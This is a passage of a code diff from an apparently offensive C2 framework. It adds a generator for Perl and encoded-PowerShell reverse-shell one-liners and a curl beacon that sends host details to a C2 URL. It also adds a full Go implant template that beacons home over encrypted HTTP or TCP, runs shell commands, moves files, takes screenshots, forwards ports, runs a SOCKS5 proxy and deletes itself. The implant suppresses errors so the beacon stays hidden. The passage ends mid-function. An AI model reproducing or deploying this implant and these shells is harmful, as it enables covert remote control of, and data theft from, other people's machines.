Socket;$i="%s";$p=%d;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'`, + host, in.Port, + ), nil + + case OnelinerPowerShell: + if err := SafeBindPort(in.Port); err != nil { + return "", err + } + // PowerShell TCP 反弹(不依赖 .NET old 版本) + ps := fmt.Sprintf( + `$c=New-Object System.Net.Sockets.TcpClient('%s',%d);$s=$c.GetStream();[byte[]]$b=0..65535|%%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|Out-String);$o2=$o+'PS '+(pwd).Path+'> ';$by=([text.encoding]::ASCII).GetBytes($o2);$s.Write($by,0,$by.Length);$s.Flush()};$c.Close()`, + host, in.Port, + ) + return fmt.Sprintf( + `powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand %s`, + utf16LEBase64(ps), + ), nil + + case OnelinerCurl: + if strings.TrimSpace(in.HTTPBaseURL) == "" { + return "", fmt.Errorf("http_base_url is required for curl_beacon") + } + if strings.TrimSpace(in.ImplantToken) == "" { + return "", fmt.Errorf("implant_token is required for curl_beacon") + } + base := strings.TrimRight(in.HTTPBaseURL, "/") + return fmt.Sprintf( + `bash -c 'H="X-Implant-Token: %s";`+ + `URL="%s";`+ + `HN=$(hostname 2>/dev/null||echo unknown);`+ + `UN=$(whoami 2>/dev/null||echo unknown);`+ + `OS=$(uname -s 2>/dev/null||echo unknown);`+ + `AR=$(uname -m 2>/dev/null||echo unknown);`+ + `IP=$(hostname -I 2>/dev/null|awk "{print \$1}"||echo "");`+ + `SID="";`+ + `while :;do `+ + `BODY="{\"hostname\":\"$HN\",\"username\":\"$UN\",\"os\":\"$OS\",\"arch\":\"$AR\",\"internal_ip\":\"$IP\",\"pid\":$$}";`+ + `R=$(curl -fsSk -H "$H" -H "Content-Type: application/json" -X POST "$URL/check_in" -d "$BODY" 2>/dev/null);`+ + `if [ -n "$R" ]&&[ -z "$SID" ];then SID=$(echo "$R"|grep -o "\"session_id\":\"[^\"]*\""|head -1|cut -d"\"" -f4);fi;`+ + `if [ -n "$SID" ];then `+ + `T=$(curl -fsSk -H "$H" -G "$URL/tasks?session_id=$SID" 2>/dev/null);`+ + `fi;`+ + `sleep 5;`+ + `done' &`, + in.ImplantToken, base, + ), nil + } + return "", fmt.Errorf("unsupported oneliner kind: %s", in.Kind) +} + +// urlEncodeForShell URL 编码字符串,避免特殊字符在 shell 中破坏转义 +func urlEncodeForShell(s string) string { + return url.QueryEscape(s) +} diff --git a/internal/c2/payload_templates/beacon.go.tmpl b/internal/c2/payload_templates/beacon.go.tmpl new file mode 100644 index 00000000..bfd3e998 --- /dev/null +++ b/internal/c2/payload_templates/beacon.go.tmpl @@ -0,0 +1,1283 @@ +// Code generated by CyberStrikeAI C2 payload builder. DO NOT EDIT. +// 此文件由 internal/c2/payload_builder.go 在生成 beacon 时填充并交叉编译。 +// 占位符列表(构建时由 text/template 替换): +// {{.ServerURL}} e.g. http://1.2.3.4:8443 +// {{.ImplantToken}} HTTP header X-Implant-Token 值 +// {{.AESKeyB64}} 32-byte AES-256 base64 +// {{.SleepSeconds}} 默认心跳间隔 +// {{.JitterPercent}} 抖动百分比 0-100 +// {{.CheckInPath}} 默认 /check_in +// {{.TasksPath}} 默认 /tasks +// {{.ResultPath}} 默认 /result +// {{.UploadPath}} 默认 /upload +// {{.FilePath}} 默认 /file/ +// {{.UserAgent}} 默认 Mozilla/5.0 ... +// {{.Transport}} http | tcp(tcp 时使用 TCP 成帧协议 + 魔数 CSB1,与 tcp_reverse 监听器配套) +// {{.TCPDialAddr}} tcp 时回连地址 host:port;http 时为空 +// {{.TransportMetadata}} 写入 check-in metadata.transport(http_beacon | tcp_beacon 等) +// +// 设计要点: +// - 无第三方依赖(仅标准库),CGO_ENABLED=0 即可跨平台编译; +// - 所有与服务端的交互均使用 AES-256-GCM 加密; +// - 任务异步并发执行(每个任务一个 goroutine),不阻塞主心跳循环; +// - 出错静默:避免 stderr/stdout 暴露 beacon 存在,panic 统一 recover。 +package main + +import ( + "bytes" + "crypto/aes" + "crypto/cipher" + "crypto/rand" + "crypto/tls" + "encoding/base64" + "encoding/binary" + "encoding/json" + "fmt" + "io" + mrand "math/rand" + "net" + "net/http" + "os" + "os/exec" + "os/user" + "path/filepath" + "runtime" + "strings" + "sync" + "time" +) + +// 编译期注入常量(text/template 替换) +const ( + serverURL = "{{.ServerURL}}" + implantToken = "{{.ImplantToken}}" + aesKeyB64 = "{{.AESKeyB64}}" + defaultSleep = {{.SleepSeconds}} + defaultJitter = {{.JitterPercent}} + checkInPath = "{{.CheckInPath}}" + tasksPath = "{{.TasksPath}}" + resultPath = "{{.ResultPath}}" + uploadPath = "{{.UploadPath}}" + filePath = "{{.FilePath}}" + userAgent = "{{.UserAgent}}" + + beaconTransport = "{{.Transport}}" + tcpDialAddr = "{{.TCPDialAddr}}" + transportMetaConst = "{{.TransportMetadata}}" +) + +const tcpBeaconWireMax = 64 << 20 + +var ( + implantUUID string + sessionID string + currentSleep = defaultSleep + currentJit = defaultJitter + cwdMu sync.Mutex + currentCwd string + httpClient *http.Client + // tcpTaskConn 在 TCP Beacon 同步执行任务时指向当前连接,供 fetchC2File 拉取服务端文件。 + tcpTaskConn net.Conn +) + +// CheckInResp 与服务端 ImplantCheckInResponse 对齐 +type CheckInResp struct { + SessionID string `json:"session_id"` + NextSleep int `json:"next_sleep"` + NextJitter int `json:"next_jitter"` + HasTasks bool `json:"has_tasks"` + ServerTime int64 `json:"server_time"` +} + +// TaskEnv 与服务端 TaskEnvelope 对齐 +type TaskEnv struct { + TaskID string `json:"task_id"` + TaskType string `json:"task_type"` + Payload map[string]interface{} `json:"payload"` +} + +// TaskReport 与服务端 TaskResultReport 对齐 +type TaskReport struct { + TaskID string `json:"task_id"` + Success bool `json:"success"` + Output string `json:"output,omitempty"` + Error string `json:"error,omitempty"` + BlobBase64 string `json:"blob_b64,omitempty"` + BlobSuffix string `json:"blob_suffix,omitempty"` + StartedAt int64 `json:"started_at"` + EndedAt int64 `json:"ended_at"` +} + +func main() { + defer func() { _ = recover() }() + implantUUID = generateImplantUUID() + currentCwd, _ = os.Getwd() + + if beaconTransport == "tcp" { + runTCPBeaconForever() + return + } + + httpClient = &http.Client{ + Timeout: 60 * time.Second, + Transport: &http.Transport{ + DisableKeepAlives: true, + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + TLSHandshakeTimeout: 10 * time.Second, + }, + } + + for { + resp, err := checkIn() + if err == nil && resp != nil { + sessionID = resp.SessionID + if resp.NextSleep > 0 { + currentSleep = resp.NextSleep + } + if resp.NextJitter >= 0 { + currentJit = resp.NextJitter + } + if resp.HasTasks { + envs, err := fetchTasks() + if err == nil { + for _, env := range envs { + go handleTaskAsync(env) + } + } + } + } + time.Sleep(applyJitter(currentSleep, currentJit)) + } +} + +func runTCPBeaconForever() { + for { + conn, err := net.DialTimeout("tcp", tcpDialAddr, 45*time.Second) + if err != nil { + time.Sleep(applyJitter(currentSleep, currentJit)) + continue + } + func() { + defer conn.Close() + if _, err := io.WriteString(conn, "CSB1"); err != nil { + return + } + tcpBeaconSessionLoop(conn) + }() + time.Sleep(applyJitter(currentSleep, currentJit)) + } +} + +func tcpWriteFrame(conn net.Conn, enc string) error { + b := []byte(enc) + if len(b) == 0 || len(b) > tcpBeaconWireMax { + return fmt.Errorf("bad tcp frame") + } + var hdr [4]byte + binary.BigEndian.PutUint32(hdr[:], uint32(len(b))) + if _, err := conn.Write(hdr[:]); err != nil { + return err + } + _, err := conn.Write(b) + return err +} + +func tcpReadFrame(conn net.Conn) (string, error) { + var n uint32 + if err := binary.Read(conn, binary.BigEndian, &n); err != nil { + return "", err + } + if n == 0 || int64(n) > int64(tcpBeaconWireMax) { + return "", fmt.Errorf("bad tcp frame size") + } + buf := make([]byte, n) + if _, err := io.ReadFull(conn, buf); err != nil { + return "", err + } + return string(buf), nil +} + +func tcpRoundTrip(conn net.Conn, plainJSON []byte) ([]byte, error) { + enc, err := encryptGCM(plainJSON) + if err != nil { + return nil, err + } + if err := tcpWriteFrame(conn, enc); err != nil { + return nil, err + } + _ = conn.SetReadDeadline(time.Now().Add(6 * time.Minute)) + cipherB64, err := tcpReadFrame(conn) + if err != nil { + return nil, err + } + return decryptGCM(cipherB64) +} + +func tcpBeaconSessionLoop(conn net.Conn) { + for { + resp, err := tcpCheckIn(conn) + if err != nil || resp == nil { + return + } + sessionID = resp.SessionID + if resp.NextSleep > 0 { + currentSleep = resp.NextSleep + } + if resp.NextJitter >= 0 { + currentJit = resp.NextJitter + } + if resp.HasTasks { + envs, err := tcpFetchTasks(conn) + if err == nil { + for _, env := range envs { + handleTaskSyncTCP(conn, env) + } + } + } + _ = conn.SetReadDeadline(time.Time{}) + time.Sleep(applyJitter(currentSleep, currentJit)) + } +} + +func tcpCheckInJSONBody() ([]byte, error) { + checkObj := map[string]interface{}{ + "uuid": implantUUID, + "hostname": hostnameOrDefault(), + "username": currentUsername(), + "os": runtime.GOOS, + "arch": runtime.GOARCH, + "pid": os.Getpid(), + "process_name": filepath.Base(exeSelf()), + "is_admin": isAdminProcess(), + "internal_ip": firstInternalIP(), + "user_agent": userAgent, + "sleep_seconds": currentSleep, + "jitter_percent": currentJit, + "metadata": map[string]interface{}{ + "transport": transportMetaConst, + "cwd": currentCwd, + }, + } + rawCheck, err := json.Marshal(checkObj) + if err != nil { + return nil, err + } + wire := map[string]interface{}{ + "op": "check_in", + "token": implantToken, + "check": json.RawMessage(rawCheck), + } + return json.Marshal(wire) +} + +func tcpCheckIn(conn net.Conn) (*CheckInResp, error) { + body, err := tcpCheckInJSONBody() + if err != nil { + return nil, err + } + plain, err := tcpRoundTrip(conn, body) + if err != nil { + return nil, err + } + var r CheckInResp + if err := json.Unmarshal(plain, &r); err != nil { + return nil, err + } + return &r, nil +} + +func tcpFetchTasks(conn net.Conn) ([]TaskEnv, error) { + wire := map[string]interface{}{ + "op": "tasks", + "token": implantToken, + "session_id": sessionID, + } + body, _ := json.Marshal(wire) + plain, err := tcpRoundTrip(conn, body) + if err != nil { + return nil, err + } + var wrapper struct { + Tasks []TaskEnv `json:"tasks"` + } + if err := json.Unmarshal(plain, &wrapper); err != nil { + return nil, err + } + return wrapper.Tasks, nil +} + +func tcpReportResult(conn net.Conn, report TaskReport) { + repRaw, err := json.Marshal(report) + if err != nil { + return + } + wire := map[string]interface{}{ + "op": "result", + "token": implantToken, + "result": json.RawMessage(repRaw), + } + body, _ := json.Marshal(wire) + _, _ = tcpRoundTrip(conn, body) +} + +func handleTaskSyncTCP(conn net.Conn, env TaskEnv) { + defer func() { _ = recover() }() + tcpTaskConn = conn + defer func() { tcpTaskConn = nil }() + start := time.Now() + output, blobB64, blobSuffix, errMsg := executeTask(env.TaskType, env.Payload) + report := TaskReport{ + TaskID: env.TaskID, + Success: errMsg == "", + Output: output, + Error: errMsg, + BlobBase64: blobB64, + BlobSuffix: blobSuffix, + StartedAt: start.UnixMilli(), + EndedAt: time.Now().UnixMilli(), + } + tcpReportResult(conn, report) +} + +func tcpFetchEncryptedFile(conn net.Conn, fileID string) ([]byte, error) { + fr, _ := json.Marshal(map[string]string{"file_id": fileID}) + wire := map[string]interface{}{ + "op": "file", + "token": implantToken, + "file": json.RawMessage(fr), + } + body, err := json.Marshal(wire) + if err != nil { + return nil, err + } + plain, err := tcpRoundTrip(conn, body) + if err != nil { + return nil, err + } + var wrapper struct { + FileData string `json:"file_data"` + } + if err := json.Unmarshal(plain, &wrapper); err != nil { + return nil, err + } + return base64.StdEncoding.DecodeString(wrapper.FileData) +} + +func fetchC2FileByID(fileID string) ([]byte, error) { + if tcpTaskConn != nil { + return tcpFetchEncryptedFile(tcpTaskConn, fileID) + } + url := fmt.Sprintf("%s%s%s.bin", serverURL, filePath, fileID) + req, _ := http.NewRequest("GET", url, nil) + req.Header.Set("User-Agent", userAgent) + req.Header.Set("X-Implant-Token", implantToken) + resp, err := httpClient.Do(req) + if err != nil { + return nil, err + } + defer resp.Body.Close() + if resp.StatusCode != 200 { + return nil, fmt.Errorf("download failed: %d", resp.StatusCode) + } + raw, err := io.ReadAll(resp.Body) + if err != nil { + return nil, err + } + plain, err := decryptGCM(string(raw)) + if err != nil { + return nil, err + } + var wrapper struct { + FileData string `json:"file_data"` + } + if err := json.Unmarshal(plain, &wrapper); err != nil { + return nil, err + } + return base64.StdEncoding.DecodeString(wrapper.FileData) +} + +func generateImplantUUID() string { + host, _ := os.Hostname() + mac := firstMACAddr() + return fmt.Sprintf("%s-%s-%d", host, mac, os.Getpid()) +} + +func firstMACAddr() string { + ifs, err := net.Interfaces() + if err != nil { + return "000000000000" + } + for _, i := range ifs { + if i.Flags&net.FlagLoopback != 0 || len(i.HardwareAddr) == 0 { + continue + } + return strings.ReplaceAll(i.HardwareAddr.String(), ":", "") + } + return "000000000000" +} + +func firstInternalIP() string { + ifs, err := net.Interfaces() + if err != nil { + return "" + } + for _, i := range ifs { + if i.Flags&net.FlagLoopback != 0 || i.Flags&net.FlagUp == 0 { + continue + } + addrs, err := i.Addrs() + if err != nil { + continue + } + for _, a := range addrs { + ipnet, ok := a.(*net.IPNet) + if !ok || ipnet.IP.To4() == nil { + continue + } + return ipnet.IP.String() + } + } + return "" +} + +func currentUsername() string { + u, err := user.Current() + if err != nil || u == nil { + return "unknown" + } + return u.Username +} + +func isAdminProcess() bool { + if runtime.GOOS == "windows" { + _, err := os.Open(filepath.Join(os.Getenv("WINDIR"), "System32", "config", "SAM")) + return err == nil + } + return os.Geteuid() == 0 +} + +func hostnameOrDefault() string { + h, _ := os.Hostname() + if h == "" { + return "unknown" + } + return h +} + +func exeSelf() string { + ex, _ := os.Executable() + if ex == "" { + return "unknown" + } + return ex +} + +func applyJitter(baseSec, jitterPct int) time.Duration { + if baseSec <= 0 { + return 5 * time.Second + } + if jitterPct <= 0 { + return time.Duration(baseSec) * time.Second + } + if jitterPct > 100 { + jitterPct = 100 + } + delta := mrand.Intn(2*jitterPct+1) - jitterPct + factor := 1.0 + float64(delta)/100.0 + return time.Duration(float64(baseSec)*factor) * time.Second +} + +func checkIn() (*CheckInResp, error) { + payload := map[string]interface{}{ + "uuid": implantUUID, + "hostname": hostnameOrDefault(), + "username": currentUsername(), + "os": runtime.GOOS, + "arch": runtime.GOARCH, + "pid": os.Getpid(), + "process_name": filepath.Base(exeSelf()), + "is_admin": isAdminProcess(), + "internal_ip": firstInternalIP(), + "user_agent": userAgent, + "sleep_seconds": currentSleep, + "jitter_percent": currentJit, + "metadata": map[string]interface{}{ + "transport": transportMetaConst, + "cwd": currentCwd, + }, + } + body, _ := json.Marshal(payload) + enc, err := encryptGCM(body) + if err != nil { + return nil, err + } + req, _ := http.NewRequest("POST", serverURL+checkInPath, bytes.NewReader([]byte(enc))) + req.Header.Set("User-Agent", userAgent) + req.Header.Set("X-Implant-Token", implantToken) + resp, err := httpClient.Do(req) + if err != nil { + return nil, err + } + defer resp.Body.Close() + if resp.StatusCode != 200 { + return nil, fmt.Errorf("checkin status %d", resp.StatusCode) + } + raw, err := io.ReadAll(resp.Body) + if err != nil { + return nil, err + } + plain, err := decryptGCM(string(raw)) + if err != nil { + return nil, err + } + var r CheckInResp + if err := json.Unmarshal(plain, &r); err != nil { + return nil, err + } + return &r, nil +} + +func fetchTasks() ([]TaskEnv, error) { + url := fmt.Sprintf("%s%s?session_id=%s", serverURL, tasksPath, sessionID) + req, _ := http.NewRequest("GET", url, nil) + req.Header.Set("User-Agent", userAgent) + req.Header.Set("X-Implant-Token", implantToken) + resp, err := httpClient.Do(req) + if err != nil { + return nil, err + } + defer resp.Body.Close() + if resp.StatusCode != 200 { + return nil, fmt.Errorf("fetch tasks status %d", resp.StatusCode) + } + raw, err := io.ReadAll(resp.Body) + if err != nil { + return nil, err + } + plain, err := decryptGCM(string(raw)) + if err != nil { + return nil, err + } + var wrapper struct { + Tasks []TaskEnv `json:"tasks"` + } + if err := json.Unmarshal(plain, &wrapper); err != nil { + return nil, err + } + return wrapper.Tasks, nil +} + +func reportResult(report TaskReport) { + body, _ := json.Marshal(report) + enc, err := encryptGCM(body) + if err != nil { + return + } + req, _ := http.NewRequest("POST", serverURL+resultPath, bytes.NewReader([]byte(enc))) + req.Header.Set("User-Agent", userAgent) + req.Header.Set("X-Implant-Token", implantToken) + resp, err := httpClient.Do(req) + if err != nil { + return + } + defer resp.Body.Close() + _, _ = io.ReadAll(resp.Body) +} + +func getAESKey() ([]byte, error) { + return base64.StdEncoding.DecodeString(aesKeyB64) +} + +func encryptGCM(plaintext []byte) (string, error) { + key, err := getAESKey() + if err != nil { + return "", err + } + block, err := aes.NewCipher(key) + if err != nil { + return "", err + } + gcm, err := cipher.NewGCM(block) + if err != nil { + return "", err + } + nonce := make([]byte, gcm.NonceSize()) + if _, err := rand.Read(nonce); err != nil { + return "", err + } + ct := gcm.Seal(nil, nonce, plaintext, nil) + out := append(nonce, ct...) + return base64.StdEncoding.EncodeToString(out), nil +} + +func decryptGCM(cipherText string) ([]byte, error) { + key, err := getAESKey() + if err != nil { + return nil, err + } + raw, err := base64.StdEncoding.DecodeString(cipherText) + if err != nil { + return nil, err + } + block, err := aes.NewCipher(key) + if err != nil { + return nil, err + } + gcm, err := cipher.NewGCM(block) + if err != nil { + return nil, err + } + ns := gcm.NonceSize() + if len(raw) < ns+16 { + return nil, fmt.Errorf("ciphertext too short") + } + nonce, ct := raw[:ns], raw[ns:] + return gcm.Open(nil, nonce, ct, nil) +} + +func handleTaskAsync(env TaskEnv) { + defer func() { _ = recover() }() + start := time.Now() + output, blobB64, blobSuffix, errMsg := executeTask(env.TaskType, env.Payload) + report := TaskReport{ + TaskID: env.TaskID, + Success: errMsg == "", + Output: output, + Error: errMsg, + BlobBase64: blobB64, + BlobSuffix: blobSuffix, + StartedAt: start.UnixMilli(), + EndedAt: time.Now().UnixMilli(), + } + reportResult(report) +} + +func executeTask(taskType string, payload map[string]interface{}) (output, blobB64, blobSuffix, errMsg string) { + switch taskType { + case "exec": + return taskExec(payload) + case "shell": + return taskShell(payload) + case "pwd": + return taskPwd() + case "cd": + return taskCd(payload) + case "ls": + return taskLs(payload) + case "ps": + return taskPs() + case "kill_proc": + return taskKillProc(payload) + case "upload": + return taskUpload(payload) + case "download": + return taskDownload(payload) + case "screenshot": + return taskScreenshot() + case "sleep": + return taskSleep(payload) + case "port_fwd": + return taskPortForward(payload) + case "socks_start": + return taskSocksStart(payload) + case "socks_stop": + return taskSocksStop(payload) + case "load_assembly": + return taskLoadAssembly(payload) + case "persist": + return taskPersist(payload) + case "exit": + os.Exit(0) + return "", "", "", "" + case "self_delete": + return taskSelfDelete() + default: + return "", "", "", "unsupported task type: " + taskType + } +} + +func shellByOS() string { + if runtime.GOOS == "windows" { + return "cmd" + } + return "/bin/sh" +} + +func shellFlag() string { + if runtime.GOOS == "windows" { + return "/c" + } + return "-c" +} + +func runWithTimeout(cmdStr string, timeoutSec int) (string, error) { + if timeoutSec <= 0 { + timeoutSec = 60 + } + cmd := exec.Command(shellByOS(), shellFlag(), cmdStr) + cwdMu.Lock() + cmd.Dir = currentCwd + cwdMu.Unlock() + + done := make(chan struct { + out []byte + err error + }, 1) + go func() { + out, err := cmd.CombinedOutput() + done <- struct { + out []byte + err error + }{out, err} + }() + select { + case res := <-done: + return string(res.out), res.err + case <-time.After(time.Duration(timeoutSec) * time.Second): + _ = cmd.Process.Kill() + return "", fmt.Errorf("timeout") + } +} + +func getTimeoutFromPayload(payload map[string]interface{}) int { + to, _ := payload["timeout_seconds"].(float64) + if to <= 0 { + return 60 + } + return int(to) +} + +func taskExec(payload map[string]interface{}) (string, string, string, string) { + cmdStr, _ := payload["command"].(string) + if cmdStr == "" { + return "", "", "", "command is empty" + } + out, err := runWithTimeout(cmdStr, getTimeoutFromPayload(payload)) + if err != nil { + return out, "", "", err.Error() + } + return out, "", "", "" +} + +func taskShell(payload map[string]interface{}) (string, string, string, string) { + cmdStr, _ := payload["command"].(string) + if cmdStr == "" { + return "", "", "", "command is empty" + } + + // Append a pwd/cd probe to the command so we can capture the real cwd + // after the user's command runs (e.g. "cd /tmp && ls" → cwd becomes /tmp). + var probe string + if runtime.GOOS == "windows" { + probe = " && cd" + } else { + probe = " && pwd" + } + combined := cmdStr + probe + + out, err := runWithTimeout(combined, getTimeoutFromPayload(payload)) + + // The last line of output is the cwd from the probe command. + // Split it off so we don't return the probe output to the operator. + lines := strings.Split(strings.TrimRight(out, "\r\n"), "\n") + if len(lines) > 0 { + candidate := strings.TrimSpace(lines[len(lines)-1]) + if filepath.IsAbs(candidate) { + if info, statErr := os.Stat(candidate); statErr == nil && info.IsDir() { + cwdMu.Lock() + currentCwd = candidate + cwdMu.Unlock() + out = strings.Join(lines[:len(lines)-1], "\n") + } + } + } + + if err != nil { + return out, "", "", err.Error() + } + return out, "", "", "" +} + +func taskPwd() (string, string, string, string) { + cwdMu.Lock() + cwd := currentCwd + cwdMu.Unlock() + return cwd, "", "", "" +} + +func taskCd(payload map[string]interface{}) (string, string, string, string) { + path, _ := payload["path"].(string) + if path == "" { + return "", "", "", "path is empty" + } + cwdMu.Lock() + if !filepath.IsAbs(path) { + path = filepath.Join(currentCwd, path) + } + cwdMu.Unlock() + abs, err := filepath.Abs(path) + if err != nil { + return "", "", "", err.Error() + } + info, err := os.Stat(abs) + if err != nil { + return "", "", "", err.Error() + } + if !info.IsDir() { + return "", "", "", "not a directory" + } + cwdMu.Lock() + currentCwd = abs + cwdMu.Unlock() + return abs, "", "", "" +} + +func taskLs(payload map[string]interface{}) (string, string, string, string) { + path, _ := payload["path"].(string) + if path == "" { + path = "." + } + cwdMu.Lock() + if !filepath.IsAbs(path) { + path = filepath.Join(currentCwd, path) + } + cwdMu.Unlock() + entries, err := os.ReadDir(path) + if err != nil { + return "", "", "", err.Error() + } + var lines []string + for _, e := range entries { + info, _ := e.Info() + if info != nil { + lines = append(lines, fmt.Sprintf("%s\t%s\t%d\t%s", + e.Type().String(), info.Mode().String(), info.Size(), e.Name())) + } else { + lines = append(lines, e.Name()) + } + } + return strings.Join(lines, "\n"), "", "", "" +} + +func taskPs() (string, string, string, string) { + if runtime.GOOS == "windows" { + out, err := runWithTimeout("tasklist", 30) + if err != nil { + return out, "", "", err.Error() + } + return out, "", "", "" + } + out, err := runWithTimeout("ps aux", 30) + if err != nil { + return out, "", "", err.Error() + } + return out, "", "", "" +} + +func taskKillProc(payload map[string]interface{}) (string, string, string, string) { + pidFloat, _ := payload["pid"].(float64) + pid := int(pidFloat) + if pid <= 0 { + return "", "", "", "invalid pid" + } + proc, err := os.FindProcess(pid) + if err != nil { + return "", "", "", err.Error() + } + if err := proc.Kill(); err != nil { + return "", "", "", err.Error() + } + return "killed", "", "", "" +} + +func taskUpload(payload map[string]interface{}) (string, string, string, string) { + remotePath, _ := payload["remote_path"].(string) + fileID, _ := payload["file_id"].(string) + if remotePath == "" || fileID == "" { + return "", "", "", "remote_path or file_id empty" + } + data, err := fetchC2FileByID(fileID) + if err != nil { + return "", "", "", err.Error() + } + if err := os.WriteFile(remotePath, data, 0644); err != nil { + return "", "", "", err.Error() + } + return fmt.Sprintf("uploaded %d bytes to %s", len(data), remotePath), "", "", "" +} + +func taskDownload(payload map[string]interface{}) (string, string, string, string) { + remotePath, _ := payload["remote_path"].(string) + if remotePath == "" { + return "", "", "", "remote_path empty" + } + data, err := os.ReadFile(remotePath) + if err != nil { + return "", "", "", err.Error() + } + // File data goes through the standard encrypted result channel via blob_b64 + b64 := base64.StdEncoding.EncodeToString(data) + suffix := filepath.Ext(remotePath) + return fmt.Sprintf("downloaded %d bytes from %s", len(data), remotePath), b64, suffix, "" +} + +func taskScreenshot() (string, string, string, string) { + var b64Out string + var err error + switch runtime.GOOS { + case "darwin": + b64Out, err = runWithTimeout("screencapture -x /tmp/.cs_ss.png && base64 /tmp/.cs_ss.png && rm -f /tmp/.cs_ss.png", 30) + case "linux": + b64Out, err = runWithTimeout("import -window root /tmp/.cs_ss.png 2>/dev/null && base64 /tmp/.cs_ss.png && rm -f /tmp/.cs_ss.png", 30) + case "windows": + ps := `Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $b=New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width,[System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); $g=[System.Drawing.Graphics]::FromImage($b); $g.CopyFromScreen([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Location,[System.Drawing.Point]::Empty,$b.Size); $m=New-Object IO.MemoryStream; $b.Save($m,[System.Drawing.Imaging.ImageFormat]::Png); [Convert]::ToBase64String($m.ToArray())` + b64Out, err = runWithTimeout(fmt.Sprintf("powershell -NoProfile -NonInteractive -Command \"%s\"", ps), 30) + default: + return "", "", "", "screenshot not supported on " + runtime.GOOS + } + if err != nil { + return "", "", "", err.Error() + } + b64Out = strings.TrimSpace(b64Out) + return "screenshot captured", b64Out, ".png", "" +} + +func taskSleep(payload map[string]interface{}) (string, string, string, string) { + s, _ := payload["seconds"].(float64) + j, _ := payload["jitter"].(float64) + currentSleep = int(s) + currentJit = int(j) + return fmt.Sprintf("sleep set to %ds (jitter %d%%)", currentSleep, currentJit), "", "", "" +} + +func taskSelfDelete() (string, string, string, string) { + exe := exeSelf() + if exe == "" || exe == "unknown" { + return "", "", "", "cannot determine self path" + } + go func() { + time.Sleep(2 * time.Second) + os.Remove(exe) + }() + os.Exit(0) + return "", "", "", "" +} + +// --- Port Forward --- + +var ( + portFwdMu sync.Mutex + portFwdConns = make(map[string]net.Listener) +) + +func taskPortForward(payload map[string]interface{}) (string, string, string, string) { + action, _ := payload["action"].(string) + localPort := int(getFloat(payload, "local_port")) + remoteHost, _ := payload["remote_host"].(string) + remotePort := int(getFloat(payload, "remote_port")) + + if action == "stop" { + key := fmt.Sprintf("%d", localPort) + portFwdMu.Lock() + if ln, ok := portFwdConns[key]; ok { + ln.Close() + delete(portFwdConns, key) + } + portFwdMu.Unlock() + return fmt.Sprintf("port forward on :%d stopped", localPort), "", "", "" + } + + if localPort <= 0 || remoteHost == "" || remotePort <= 0 { + return "", "", "", "local_port, remote_host, remote_port required" + } + + ln, err := net.Listen("tcp", fmt.Sprintf("127.0.0.1:%d", localPort)) + if err != nil { + return "", "", "", err.Error() + } + key := fmt.Sprintf("%d", localPort) + portFwdMu.Lock() + portFwdConns[key] = ln + portFwdMu.Unlock() + + go func() { + for { + conn, err := ln.Accept() + if err != nil { + return + } + go func(c net.Conn) { + defer c.Close() + remote, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", remoteHost, remotePort), 10*time.Second) + if err != nil { + return + } + defer remote.Close() + done := make(chan struct{}, 2) + go func() { io.Copy(remote, c); done <- struct{}{} }() + go func() { io.Copy(c, remote); done <- struct{}{} }() + <-done + }(conn) + } + }() + return fmt.Sprintf("port forward 127.0.0.1:%d -> %s:%d started", localPort, remoteHost, remotePort), "", "", "" +} + +// --- SOCKS5 Proxy --- + +var ( + socksMu sync.Mutex + socksListener net.Listener +) + +func taskSocksStart(payload map[string]interface{}) (string, string, string, string) { + port := int(getFloat(payload, "port")) + if port <= 0 { + port = 1080 + } + + socksMu.Lock() + if socksListener != nil { + socksMu.Unlock() + return "", "", "", "socks proxy already running" + } + socksMu.Unlock() + + ln, err := net.Listen("tcp", fmt.Sprintf("127.0.0.1:%d", port)) + if err != nil { + return "", "", "", err.Error() + } + socksMu.Lock() + socksListener = ln + socksMu.Unlock() + + go func() { + for { + conn, err := ln.Accept() + if err != nil { + return + } + go handleSocks5(conn) + } + }() + return fmt.Sprintf("SOCKS5 proxy started on 127.0.0.1:%d", port), "", "", "" +} + +func taskSocksStop(payload map[string]interface{}) (string, string, string, string) { + socksMu.Lock() + if socksListener != nil { + socksListener.Close() + socksListener = nil + } + socksMu.Unlock() + return "SOCKS5 proxy stopped", "", "", "" +} + +func handleSocks5(conn net.Conn) { + defer conn.Close() + buf := make([]byte, 258) + // Auth negotiation + n, err := conn.Read(buf) + if err != nil || n < 3 || buf[0] != 0x05 { + return + } + conn.Write([]byte{0x05, 0x00}) // no auth + + // Request + n, err = conn.Read(buf) + if err != nil || n < 7 || buf[0] != 0x05 || buf[1] != 0x01 { + conn.Write([]byte{0x05, 0x07, 0x00, 0x01, 0, 0, 0, 0, 0, 0}) + return + } + + var target string + switch buf[3] { + case 0x01: // IPv4 + if n < 10 { + return + } + target = fmt.Sprintf("%d.%d.%d.%d:%d", buf[4], buf[5], buf[6], buf[7], + int(buf[8])<<8|int(buf[9])) + case 0x03: // Domain + domainLen := int(buf[4]) + if n < 5+domainLen+2 { + return + } + domain := string(buf[5 : 5+domainLen]) + port := int(buf[5+domainLen])<<8 | int(buf[5+domainLen+1]) + target = fmt.Sprintf("%s:%d", domain, port) + case 0x04: // IPv6 + if n < 22 { + return + } + ip := net.IP(buf[4:20]) + port := int(buf[20])<<8 | int(buf[21]) + target = fmt.Sprintf("[%s]:%d", ip.String(), port) + default: + conn.Write([]byte{0x05, 0x08, 0x00, 0x01, 0, 0, 0, 0, 0, 0}) + return + } + + remote, err := net.DialTimeout("tcp", target, 10*time.Second) + if err != nil { + conn.Write([]byte{0x05, 0x05, 0x00, 0x01, 0, 0, 0, 0, 0, 0}) + return + } + defer remote.Close() + + // Success reply + conn.Write([]byte{0x05, 0x00, 0x00, 0x01, 0, 0, 0, 0, 0, 0}) + + done := make(chan struct{}, 2) + go func() { io.Copy(remote, conn); done <- 